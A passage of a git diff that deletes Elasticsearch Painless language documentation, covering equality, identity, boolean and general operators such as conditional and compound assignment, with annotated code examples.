-[source,Painless] ----- -int a = 1; <1> -double b = 2.0; <2> -boolean c = a == b; <3> -c = 1 == a; <4> ----- -+ -<1> declare `int a`; - store `int 1` to `a` -<2> declare `double b`; - store `double 1.0` to `b` -<3> declare `boolean c`; - load from `a` -> `int 1`; - load from `b` -> `double 2.0`; - promote `int 1` and `double 2.0`: result `double`; - implicit cast `int 1` to `double 1.0` -> `double `1.0`; - equality equals `double 1.0` and `double 2.0` -> `boolean false`; - store `boolean false` to `c` -<4> load from `a` -> `int 1 @1`; - equality equals `int 1 @0` and `int 1 @1` -> `boolean true`; - store `boolean true` to `c` -+ -* Equal equals with reference types. -+ -[source,Painless] ----- -List a = new ArrayList(); <1> -List b = new ArrayList(); <2> -a.add(1); <3> -boolean c = a == b; <4> -b.add(1); <5> -c = a == b; <6> ----- -+ -<1> declare `List a`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `a` -<2> declare `List b`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `b` -<3> load from `a` -> `List reference`; - call `add` on `List reference` with arguments (`int 1)` -<4> declare `boolean c`; - load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - call `equals` on `List reference @0` with arguments (`List reference @1`) - -> `boolean false`; - store `boolean false` to `c` -<5> load from `b` -> `List reference`; - call `add` on `List reference` with arguments (`int 1`) -<6> load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - call `equals` on `List reference @0` with arguments (`List reference @1`) - -> `boolean true`; - store `boolean true` to `c` -+ -* Equality equals with `null`. -+ -[source,Painless] ----- -Object a = null; <1> -Object b = null; <2> -boolean c = a == null; <3> -c = a == b; <4> -b = new Object(); <5> -c = a == b; <6> ----- -+ -<1> declare `Object a`; - store `null` to `a` -<2> declare `Object b`; - store `null` to `b` -<3> declare `boolean c`; - load from `a` -> `null @0`; - equality equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<4> load from `a` -> `null @0`; - load from `b` -> `null @1`; - equality equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<5> allocate `Object` instance -> `Object reference`; - store `Object reference` to `b` -<6> load from `a` -> `Object reference`; - load from `b` -> `null`; - call `equals` on `Object reference` with arguments (`null`) - -> `boolean false`; - store `boolean false` to `c` -+ -* Equality equals with the `def` type. -+ -[source, Painless] ----- -def a = 0; <1> -def b = 1; <2> -boolean c = a == b; <3> -def d = new HashMap(); <4> -def e = new ArrayList(); <5> -c = d == e; <6> ----- -+ -<1> declare `def a`; - implicit cast `int 0` to `def` -> `def`; - store `def` to `a`; -<2> declare `def b`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `b`; -<3> declare `boolean c`; - load from `a` -> `def`; - implicit cast `a` to `int 0` -> `int 0`; - load from `b` -> `def`; - implicit cast `b` to `int 1` -> `int 1`; - equality equals `int 0` and `int 1` -> `boolean false`; - store `boolean false` to `c` -<4> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def` - store `def` to `d`; -<5> declare `def e`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def` - store `def` to `d`; -<6> load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - load from `e` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `equals` on `HashMap reference` with arguments (`ArrayList reference`) - -> `boolean false`; - store `boolean false` to `c` - -[[equality-not-equals-operator]] -==== Equality Not Equals - -Use the `equality not equals operator '!='` to COMPARE two values where a -resultant `boolean` type value is `true` if the two values are NOT equal and -`false` otherwise. The member method, `equals`, is implicitly called when the -values are reference type values where the first value is the target of the call -and the second value is the argument with the resultant `boolean` type value -flipped. This operation is `null-safe` where if both values are `null` the -resultant `boolean` type value is `false`, and if only one value is `null` the -resultant `boolean` type value is `true`. A valid comparison is between boolean -type values, numeric type values, or reference type values. - -*Errors* - -* If a comparison is made between a `boolean` type value and numeric type value. -* If a comparison is made between a primitive type value and a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -equality_not_equals: expression '!=' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Equality not equals with the `boolean` type. -+ -[source,Painless] ----- -boolean a = true; <1> -boolean b = false; <2> -a = a != false; <3> -b = a != b; <4> ----- -+ -<1> declare `boolean a`; - store `boolean true` to `a` -<2> declare `boolean b`; - store `boolean false` to `b` -<3> load from `a` -> `boolean true`; - equality not equals `boolean true` and `boolean false` -> `boolean true`; - store `boolean true` to `a` -<4> load from `a` -> `boolean true`; - load from `b` -> `boolean false`; - equality not equals `boolean true` and `boolean false` -> `boolean true`; - store `boolean true` to `b` -+ -* Equality not equals with primitive types. -+ -[source,Painless] ----- -int a = 1; <1> -double b = 2.0; <2> -boolean c = a != b; <3> -c = 1 != a; <4> ----- -+ -<1> declare `int a`; - store `int 1` to `a` -<2> declare `double b`; - store `double 1.0` to `b` -<3> declare `boolean c`; - load from `a` -> `int 1`; - load from `b` -> `double 2.0`; - promote `int 1` and `double 2.0`: result `double`; - implicit cast `int 1` to `double 1.0` -> `double `1.0`; - equality not equals `double 1.0` and `double 2.0` -> `boolean true`; - store `boolean true` to `c` -<4> load from `a` -> `int 1 @1`; - equality not equals `int 1 @0` and `int 1 @1` -> `boolean false`; - store `boolean false` to `c` -+ -* Equality not equals with reference types. -+ -[source,Painless] ----- -List a = new ArrayList(); <1> -List b = new ArrayList(); <2> -a.add(1); <3> -boolean c = a == b; <4> -b.add(1); <5> -c = a == b; <6> ----- -+ -<1> declare `List a`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `a` -<2> declare `List b`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `b` -<3> load from `a` -> `List reference`; - call `add` on `List reference` with arguments (`int 1)` -<4> declare `boolean c`; - load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - call `equals` on `List reference @0` with arguments (`List reference @1`) - -> `boolean false`; - boolean not `boolean false` -> `boolean true` - store `boolean true` to `c` -<5> load from `b` -> `List reference`; - call `add` on `List reference` with arguments (`int 1`) -<6> load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - call `equals` on `List reference @0` with arguments (`List reference @1`) - -> `boolean true`; - boolean not `boolean true` -> `boolean false`; - store `boolean false` to `c` -+ -* Equality not equals with `null`. -+ -[source,Painless] ----- -Object a = null; <1> -Object b = null; <2> -boolean c = a == null; <3> -c = a == b; <4> -b = new Object(); <5> -c = a == b; <6> ----- -+ -<1> declare `Object a`; - store `null` to `a` -<2> declare `Object b`; - store `null` to `b` -<3> declare `boolean c`; - load from `a` -> `null @0`; - equality not equals `null @0` and `null @1` -> `boolean false`; - store `boolean false` to `c` -<4> load from `a` -> `null @0`; - load from `b` -> `null @1`; - equality not equals `null @0` and `null @1` -> `boolean false`; - store `boolean false` to `c` -<5> allocate `Object` instance -> `Object reference`; - store `Object reference` to `b` -<6> load from `a` -> `Object reference`; - load from `b` -> `null`; - call `equals` on `Object reference` with arguments (`null`) - -> `boolean false`; - boolean not `boolean false` -> `boolean true`; - store `boolean true` to `c` -+ -* Equality not equals with the `def` type. -+ -[source, Painless] ----- -def a = 0; <1> -def b = 1; <2> -boolean c = a == b; <3> -def d = new HashMap(); <4> -def e = new ArrayList(); <5> -c = d == e; <6> ----- -+ -<1> declare `def a`; - implicit cast `int 0` to `def` -> `def`; - store `def` to `a`; -<2> declare `def b`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `b`; -<3> declare `boolean c`; - load from `a` -> `def`; - implicit cast `a` to `int 0` -> `int 0`; - load from `b` -> `def`; - implicit cast `b` to `int 1` -> `int 1`; - equality equals `int 0` and `int 1` -> `boolean false`; - store `boolean false` to `c` -<4> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def` - store `def` to `d`; -<5> declare `def e`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def` - store `def` to `d`; -<6> load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - load from `e` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `equals` on `HashMap reference` with arguments (`ArrayList reference`) - -> `boolean false`; - store `boolean false` to `c` - -[[identity-equals-operator]] -==== Identity Equals - -Use the `identity equals operator '==='` to COMPARE two values where a resultant -`boolean` type value is `true` if the two values are equal and `false` -otherwise. A reference type value is equal to another reference type value if -both values refer to same instance on the heap or if both values are `null`. A -valid comparison is between `boolean` type values, numeric type values, or -reference type values. - -*Errors* - -* If a comparison is made between a `boolean` type value and numeric type value. -* If a comparison is made between a primitive type value and a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -identity_equals: expression '===' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Identity equals with reference types. -+ -[source,Painless] ----- -List a = new ArrayList(); <1> -List b = new ArrayList(); <2> -List c = a; <3> -boolean c = a === b; <4> -c = a === c; <5> ----- -+ -<1> declare `List a`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `a` -<2> declare `List b`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `b` -<3> load from `a` -> `List reference`; - store `List reference` to `c` -<4> declare `boolean c`; - load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - identity equals `List reference @0` and `List reference @1` - -> `boolean false` - store `boolean false` to `c` -<5> load from `a` -> `List reference @0`; - load from `c` -> `List reference @1`; - identity equals `List reference @0` and `List reference @1` - -> `boolean true` - store `boolean true` to `c` - (note `List reference @0` and `List reference @1` refer to the same - instance) -+ -* Identity equals with `null`. -+ -[source,Painless] ----- -Object a = null; <1> -Object b = null; <2> -boolean c = a === null; <3> -c = a === b; <4> -b = new Object(); <5> -c = a === b; <6> ----- -+ -<1> declare `Object a`; - store `null` to `a` -<2> declare `Object b`; - store `null` to `b` -<3> declare `boolean c`; - load from `a` -> `null @0`; - identity equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<4> load from `a` -> `null @0`; - load from `b` -> `null @1`; - identity equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<5> allocate `Object` instance -> `Object reference`; - store `Object reference` to `b` -<6> load from `a` -> `Object reference`; - load from `b` -> `null`; - identity equals `Object reference` and `null` -> `boolean false`; - store `boolean false` to `c` -+ -* Identity equals with the `def` type. -+ -[source, Painless] ----- -def a = new HashMap(); <1> -def b = new ArrayList(); <2> -boolean c = a === b; <3> -b = a; <4> -c = a === b; <5> ----- -+ -<1> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def` - store `def` to `d` -<2> declare `def e`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def` - store `def` to `d` -<3> declare `boolean c`; - load from `a` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - load from `b` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - identity equals `HashMap reference` and `ArrayList reference` - -> `boolean false`; - store `boolean false` to `c` -<4> load from `a` -> `def`; - store `def` to `b` -<5> load from `a` -> `def`; - implicit cast `def` to `HashMap reference @0` -> `HashMap reference @0`; - load from `b` -> `def`; - implicit cast `def` to `HashMap reference @1` -> `HashMap reference @1`; - identity equals `HashMap reference @0` and `HashMap reference @1` - -> `boolean true`; - store `boolean true` to `b`; - (note `HashMap reference @0` and `HashMap reference @1` refer to the same - instance) - -[[identity-not-equals-operator]] -==== Identity Not Equals - -Use the `identity not equals operator '!=='` to COMPARE two values where a -resultant `boolean` type value is `true` if the two values are NOT equal and -`false` otherwise. A reference type value is not equal to another reference type -value if both values refer to different instances on the heap or if one value is -`null` and the other is not. A valid comparison is between `boolean` type -values, numeric type values, or reference type values. - -*Errors* - -* If a comparison is made between a `boolean` type value and numeric type value. -* If a comparison is made between a primitive type value and a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -identity_not_equals: expression '!==' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Identity not equals with reference type values. -+ -[source,Painless] ----- -List a = new ArrayList(); <1> -List b = new ArrayList(); <2> -List c = a; <3> -boolean c = a !== b; <4> -c = a !== c; <5> ----- -+ -<1> declare `List a`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `a` -<2> declare `List b`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `b` -<3> load from `a` -> `List reference`; - store `List reference` to `c` -<4> declare `boolean c`; - load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - identity not equals `List reference @0` and `List reference @1` - -> `boolean true` - store `boolean true` to `c` -<5> load from `a` -> `List reference @0`; - load from `c` -> `List reference @1`; - identity not equals `List reference @0` and `List reference @1` - -> `boolean false` - store `boolean false` to `c` - (note `List reference @0` and `List reference @1` refer to the same - instance) -+ -* Identity not equals with `null`. -+ -[source,Painless] ----- -Object a = null; <1> -Object b = null; <2> -boolean c = a !== null; <3> -c = a !== b; <4> -b = new Object(); <5> -c = a !== b; <6> ----- -+ -<1> declare `Object a`; - store `null` to `a` -<2> declare `Object b`; - store `null` to `b` -<3> declare `boolean c`; - load from `a` -> `null @0`; - identity not equals `null @0` and `null @1` -> `boolean false`; - store `boolean false` to `c` -<4> load from `a` -> `null @0`; - load from `b` -> `null @1`; - identity not equals `null @0` and `null @1` -> `boolean false`; - store `boolean false` to `c` -<5> allocate `Object` instance -> `Object reference`; - store `Object reference` to `b` -<6> load from `a` -> `Object reference`; - load from `b` -> `null`; - identity not equals `Object reference` and `null` -> `boolean true`; - store `boolean true` to `c` -+ -* Identity not equals with the `def` type. -+ -[source, Painless] ----- -def a = new HashMap(); <1> -def b = new ArrayList(); <2> -boolean c = a !== b; <3> -b = a; <4> -c = a !== b; <5> ----- -+ -<1> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def` - store `def` to `d` -<2> declare `def e`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def` - store `def` to `d` -<3> declare `boolean c`; - load from `a` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - load from `b` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - identity not equals `HashMap reference` and `ArrayList reference` - -> `boolean true`; - store `boolean true` to `c` -<4> load from `a` -> `def`; - store `def` to `b` -<5> load from `a` -> `def`; - implicit cast `def` to `HashMap reference @0` -> `HashMap reference @0`; - load from `b` -> `def`; - implicit cast `def` to `HashMap reference @1` -> `HashMap reference @1`; - identity not equals `HashMap reference @0` and `HashMap reference @1` - -> `boolean false`; - store `boolean false` to `b`; - (note `HashMap reference @0` and `HashMap reference @1` refer to the same - instance) - -[[boolean-xor-operator]] -==== Boolean Xor - -Use the `boolean xor operator '^'` to XOR together two `boolean` type values -where if one `boolean` type value is `true` and the other is `false` the -resultant `boolean` type value is `true` and `false` otherwise. - -*Errors* - -* If either evaluated value is a value other than a `boolean` type value or - a value that is castable to a `boolean` type value. - -*Truth* - -[cols="^1,^1,^1"] -|==== -| | true | false -| true | false | true -| false | true | false -|==== - -*Grammar* - -[source,ANTLR4] ----- -boolean_xor: expression '^' expression; ----- - -*Examples* - -* Boolean xor with the `boolean` type. -+ -[source,Painless] ----- -boolean x = false; <1> -boolean y = x ^ true; <2> -y = y ^ x; <3> ----- -+ -<1> declare `boolean x`; - store `boolean false` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean false` - boolean xor `boolean false` and `boolean true` -> `boolean true`; - store `boolean true` to `y` -<3> load from `y` -> `boolean true @0`; - load from `x` -> `boolean true @1`; - boolean xor `boolean true @0` and `boolean true @1` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean xor with the `def` type. -+ -[source,Painless] ----- -def x = false; <1> -def y = x ^ true; <2> -y = y ^ x; <3> ----- -+ -<1> declare `def x`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `boolean false` -> `boolean false`; - boolean xor `boolean false` and `boolean true` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `y` -<3> load from `y` -> `def`; - implicit cast `def` to `boolean true @0` -> `boolean true @0`; - load from `x` -> `def`; - implicit cast `def` to `boolean true @1` -> `boolean true @1`; - boolean xor `boolean true @0` and `boolean true @1` -> `boolean false`; - implicit cast `boolean false` -> `def`; - store `def` to `y` - -[[boolean-and-operator]] -==== Boolean And - -Use the `boolean and operator '&&'` to AND together two `boolean` type values -where if both `boolean` type values are `true` the resultant `boolean` type -value is `true` and `false` otherwise. - -*Errors* - -* If either evaluated value is a value other than a `boolean` type value or - a value that is castable to a `boolean` type value. - -*Truth* - -[cols="^1,^1,^1"] -|==== -| | true | false -| true | true | false -| false | false | false -|==== - -*Grammar* - -[source,ANTLR4] ----- -boolean_and: expression '&&' expression; ----- - -*Examples* - -* Boolean and with the `boolean` type. -+ -[source,Painless] ----- -boolean x = true; <1> -boolean y = x && true; <2> -x = false; <3> -y = y && x; <4> ----- -+ -<1> declare `boolean x`; - store `boolean true` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean true @0`; - boolean and `boolean true @0` and `boolean true @1` -> `boolean true`; - store `boolean true` to `y` -<3> store `boolean false` to `x` -<4> load from `y` -> `boolean true`; - load from `x` -> `boolean false`; - boolean and `boolean true` and `boolean false` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean and with the `def` type. -+ -[source,Painless] ----- -def x = true; <1> -def y = x && true; <2> -x = false; <3> -y = y && x; <4> ----- -+ -<1> declare `def x`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `boolean true @0` -> `boolean true @0`; - boolean and `boolean true @0` and `boolean true @1` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `y` -<3> implicit cast `boolean false` to `def` -> `def`; - store `def` to `x`; -<4> load from `y` -> `def`; - implicit cast `def` to `boolean true` -> `boolean true`; - load from `x` -> `def`; - implicit cast `def` to `boolean false` -> `boolean false`; - boolean and `boolean true` and `boolean false` -> `boolean false`; - implicit cast `boolean false` -> `def`; - store `def` to `y` - -[[boolean-or-operator]] -==== Boolean Or - -Use the `boolean or operator '||'` to OR together two `boolean` type values -where if either one of the `boolean` type values is `true` the resultant -`boolean` type value is `true` and `false` otherwise. - -*Errors* - -* If either evaluated value is a value other than a `boolean` type value or - a value that is castable to a `boolean` type value. - -*Truth* - -[cols="^1,^1,^1"] -|==== -| | true | false -| true | true | true -| false | true | false -|==== - -*Grammar:* -[source,ANTLR4] ----- -boolean_and: expression '||' expression; ----- - -*Examples* - -* Boolean or with the `boolean` type. -+ -[source,Painless] ----- -boolean x = false; <1> -boolean y = x || true; <2> -y = false; <3> -y = y || x; <4> ----- -+ -<1> declare `boolean x`; - store `boolean false` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean false`; - boolean or `boolean false` and `boolean true` -> `boolean true`; - store `boolean true` to `y` -<3> store `boolean false` to `y` -<4> load from `y` -> `boolean false @0`; - load from `x` -> `boolean false @1`; - boolean or `boolean false @0` and `boolean false @1` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean or with the `def` type. -+ -[source,Painless] ----- -def x = false; <1> -def y = x || true; <2> -y = false; <3> -y = y || x; <4> ----- -+ -<1> declare `def x`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `boolean false` -> `boolean true`; - boolean or `boolean false` and `boolean true` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `y` -<3> implicit cast `boolean false` to `def` -> `def`; - store `def` to `y`; -<4> load from `y` -> `def`; - implicit cast `def` to `boolean false @0` -> `boolean false @0`; - load from `x` -> `def`; - implicit cast `def` to `boolean false @1` -> `boolean false @1`; - boolean or `boolean false @0` and `boolean false @1` -> `boolean false`; - implicit cast `boolean false` -> `def`; - store `def` to `y` diff --git a/docs/painless/painless-lang-spec/painless-operators-general.asciidoc b/docs/painless/painless-lang-spec/painless-operators-general.asciidoc deleted file mode 100644 index 6c17e36b3fc..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-general.asciidoc +++ /dev/null @@ -1,432 +0,0 @@ -[[painless-operators-general]] -=== Operators: General - -[[precedence-operator]] -==== Precedence - -Use the `precedence operator '()'` to guarantee the order of evaluation for an -expression. An expression encapsulated by the precedence operator (enclosed in -parentheses) overrides existing precedence relationships between operators and -is evaluated prior to other expressions in inward-to-outward order. - -*Grammar* - -[source,ANTLR4] ----- -precedence: '(' expression ')'; ----- - -*Examples* - -* Precedence with numeric operators. -+ -[source,Painless] ----- -int x = (5+4)*6; <1> -int y = 12/(x-50); <2> ----- -+ -<1> declare `int x`; - add `int 5` and `int 4` -> `int 9`; - multiply `int 9` and `int 6` -> `int 54`; - store `int 54` to `x`; - (note the add is evaluated before the multiply due to the precedence - operator) -<2> declare `int y`; - load from `x` -> `int 54`; - subtract `int 50` from `int 54` -> `int 4`; - divide `int 12` by `int 4` -> `int 3`; - store `int 3` to `y`; - (note the subtract is evaluated before the divide due to the precedence - operator) - -[[function-call-operator]] -==== Function Call - -Use the `function call operator ()` to call an existing function. A -<> is defined within a script. - -*Grammar* - -[source,ANTLR4] ----- -function_call: ID '(' ( expression (',' expression)* )? ')''; ----- - -*Examples* - -* A function call. -+ -[source,Painless] ----- -int add(int x, int y) { <1> - return x + y; - } - -int z = add(1, 2); <2> ----- -+ -<1> define function `add` that returns `int` and has parameters (`int x`, - `int y`) -<2> declare `int z`; - call `add` with arguments (`int 1`, `int 2`) -> `int 3`; - store `int 3` to `z` - -[[cast-operator]] -==== Cast - -An explicit cast converts the value of an original type to the equivalent value -of a target type forcefully as an operation. Use the `cast operator '()'` to -specify an explicit cast. Refer to <> for more -information. - -[[conditional-operator]] -==== Conditional - -A conditional consists of three expressions. The first expression is evaluated -with an expected boolean result type. If the first expression evaluates to true -then the second expression will be evaluated. If the first expression evaluates -to false then the third expression will be evaluated. The second and third -expressions will be <> if the evaluated values are not the -same type. Use the `conditional operator '? :'` as a shortcut to avoid the need -for a full if/else branch in certain expressions. - -*Errors* - -* If the first expression does not evaluate to a boolean type value. -* If the values for the second and third expressions cannot be promoted. - -*Grammar* - -[source,ANTLR4] ----- -conditional: expression '?' expression ':' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | Reference | def -| byte | int | int | int | int | long | float | double | - | def -| short | int | int | int | int | long | float | double | - | def -| char | int | int | int | int | long | float | double | - | def -| int | int | int | int | int | long | float | double | - | def -| long | long | long | long | long | long | float | double | - | def -| float | float | float | float | float | float | float | double | - | def -| double | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | Object @ | def -| def | def | def | def | def | def | def | def | def | def -|==== - -@ If the two reference type values are the same then this promotion will not -occur. - -*Examples* - -* Evaluation of conditionals. -+ -[source,Painless] ----- -boolean b = true; <1> -int x = b ? 1 : 2; <2> -List y = x > 1 ? new ArrayList() : null; <3> -def z = x < 2 ? x : 2.0; <4> ----- -+ -<1> declare `boolean b`; - store `boolean true` to `b` -<2> declare `int x`; - load from `b` -> `boolean true` - evaluate 1st expression: `int 1` -> `int 1`; - store `int 1` to `x` -<3> declare `List y`; - load from `x` -> `int 1`; - `int 1` greater than `int 1` -> `boolean false`; - evaluate 2nd expression: `null` -> `null`; - store `null` to `y`; -<4> declare `def z`; - load from `x` -> `int 1`; - `int 1` less than `int 2` -> `boolean true`; - evaluate 1st expression: load from `x` -> `int 1`; - promote `int 1` and `double 2.0`: result `double`; - implicit cast `int 1` to `double 1.0` -> `double 1.0`; - implicit cast `double 1.0` to `def` -> `def`; - store `def` to `z`; - -[[assignment-operator]] -==== Assignment - -Use the `assignment operator '='` to store a value in a variable or reference -type member field for use in subsequent operations. Any operation that produces -a value can be assigned to any variable/field as long as the -<> are the same or the resultant type can be -<> to the variable/field type. - -See <> for examples using variables. - -*Errors* - -* If the type of value is unable to match the type of variable or field. - -*Grammar* - -[source,ANTLR4] ----- -assignment: field '=' expression ----- - -*Examples* - -The examples use the following reference type definition: - -[source,Painless] ----- -name: - Example - -non-static member fields: - * int x - * def y - * List z ----- - -* Field assignments of different type values. -+ -[source,Painless] ----- -Example example = new Example(); <1> -example.x = 1; <2> -example.y = 2.0; <3> -example.z = new ArrayList(); <4> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> load from `example` -> `Example reference`; - store `int 1` to `x` of `Example reference` -<3> load from `example` -> `Example reference`; - implicit cast `double 2.0` to `def` -> `def`; - store `def` to `y` of `Example reference` -<4> load from `example` -> `Example reference`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `z` of `Example reference` -+ -* A field assignment from a field access. -+ -[source,Painless] ----- -Example example = new Example(); <1> -example.x = 1; <2> -example.y = example.x; <3> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> load from `example` -> `Example reference`; - store `int 1` to `x` of `Example reference` -<3> load from `example` -> `Example reference @0`; - load from `example` -> `Example reference @1`; - load from `x` of `Example reference @1` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y` of `Example reference @0`; - (note `Example reference @0` and `Example reference @1` are the same) - -[[compound-assignment-operator]] -==== Compound Assignment - -Use the `compound assignment operator '$='` as a shortcut for an assignment -where a binary operation would occur between the variable/field as the -left-hand side expression and a separate right-hand side expression. - -A compound assignment is equivalent to the expression below where V is the -variable/field and T is the type of variable/member. - -[source,Painless] ----- -V = (T)(V op expression); ----- - -*Operators* - -The table below shows the available operators for use in a compound assignment. -Each operator follows the casting/promotion rules according to their regular -definition. For numeric operations there is an extra implicit cast when -necessary to return the promoted numeric type value to the original numeric type -value of the variable/field and can result in data loss. - -|==== -|Operator|Compound Symbol -|Multiplication|*= -|Division|/= -|Remainder|%= -|Addition|+= -|Subtraction|-= -|Left Shift|+++<<=+++ -|Right Shift|>>= -|Unsigned Right Shift|>>>= -|Bitwise And|&= -|Boolean And|&= -|Bitwise Xor|^= -|Boolean Xor|^= -|Bitwise Or|\|= -|Boolean Or|\|= -|String Concatenation|+= -|==== - -*Errors* - -* If the type of value is unable to match the type of variable or field. - -*Grammar* - -[source,ANTLR4] ----- -compound_assignment: ( ID | field ) '$=' expression; ----- - -Note the use of the `$=` represents the use of any of the possible binary -operators. - -*Examples* - -* Compound assignment for each numeric operator. -+ -[source,Painless] ----- -int i = 10; <1> -i *= 2; <2> -i /= 5; <3> -i %= 3; <4> -i += 5; <5> -i -= 5; <6> -i <<= 2; <7> -i >>= 1; <8> -i >>>= 1; <9> -i &= 15; <10> -i ^= 12; <11> -i |= 2; <12> ----- -+ -<1> declare `int i`; - store `int 10` to `i` -<2> load from `i` -> `int 10`; - multiply `int 10` and `int 2` -> `int 20`; - store `int 20` to `i`; - (note this is equivalent to `i = i*2`) -<3> load from `i` -> `int 20`; - divide `int 20` by `int 5` -> `int 4`; - store `int 4` to `i`; - (note this is equivalent to `i = i/5`) -<4> load from `i` -> `int 4`; - remainder `int 4` by `int 3` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = 